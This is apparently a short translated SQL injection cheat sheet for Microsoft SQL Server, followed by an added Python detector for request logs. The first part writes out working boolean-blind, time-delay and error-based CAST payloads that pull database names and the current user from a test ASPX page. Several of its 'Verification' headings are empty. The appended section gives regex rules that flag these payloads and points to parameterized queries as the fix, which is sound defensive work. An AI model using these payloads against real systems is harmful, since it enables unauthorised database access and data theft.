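1. Injection types
- Boolean-based blind injection: http://192.168.232.174/Test.aspx?id=1 and ascii(substring((select top 1 name from master..sysdatabases),1,1))>100
Verification:
- Time-based blind injection: http://192.168.232.174/test.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 waitfor delay '0:0:5'--+
Verification:
Note: numeric placeholders are generally not used; null is used instead, because a numeric placeholder may trigger an implicit conversion.
It can be used in the following ways:
2. Simple injection bypass
- Error-based injection syntax: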
CAST( expression AS data_type )
CONVERT(data_type[(length)], expression [, style])
http://192.168.232.174/test.aspx?id=1; select * from admin where id =1 (select CAST(USER as int))
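For the defending side, the three request shapes listed above (boolean blind, time blind, error-based CAST/CONVERT) can be flagged in web server request logs. The following is an added example, not part of the original page: the rule names, function names and the sample request targets (the page's own payloads, URL-encoded) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One signature per MSSQL technique described on this page (assumed rule names).
RULES = {
    # ascii(substring(...)) compared against a number: character-by-character extraction
    "boolean_blind": re.compile(
        r"\bascii\s*\(\s*substring\s*\(.*?\)\s*[<>=]", re.I | re.S),
    # WAITFOR DELAY used as a timing side channel
    "time_blind": re.compile(r"\bwaitfor\s+delay\b", re.I),
    # CAST(... AS int) / CONVERT(int, ...) forcing a type-conversion error
    "error_based": re.compile(
        r"\b(?:cast\s*\(.+?\bas\s+int\b|convert\s*\(\s*int\s*,)", re.I | re.S),
}

def decode_query(target: str) -> str:
    """Return the query string, percent-decoded until stable (max 3 rounds)
    so that double-encoded payloads are still inspected in clear form."""
    query = urlsplit(target).query
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def classify(target: str) -> list:
    """Return the sorted names of all rules matching the request target."""
    query = decode_query(target)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

# Constructed sample request targets, as they would appear in an access log.
SAMPLES = [
    "/Test.aspx?id=1",
    "/Test.aspx?id=1%20and%20ascii(substring((select%20top%201%20name%20from"
    "%20master..sysdatabases),1,1))%3E100",
    "/test.aspx?id=1;if%20(ascii(substring((select%20top%201%20name%20from"
    "%20master.dbo.sysdatabases),1,1)))%3E1%20waitfor%20delay%20'0:0:5'--+",
    "/test.aspx?id=1;%20select%20*%20from%20admin%20where%20id%20=1%20"
    "(select%20CAST(USER%20as%20int))",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or ["clean"], sample[:60])
```

The time-based sample matches two rules because it wraps the same `ascii(substring(...))` comparison in a `waitfor delay`. Signature matching like this is a detection aid; the fix for the underlying flaw is a parameterized query for `id`.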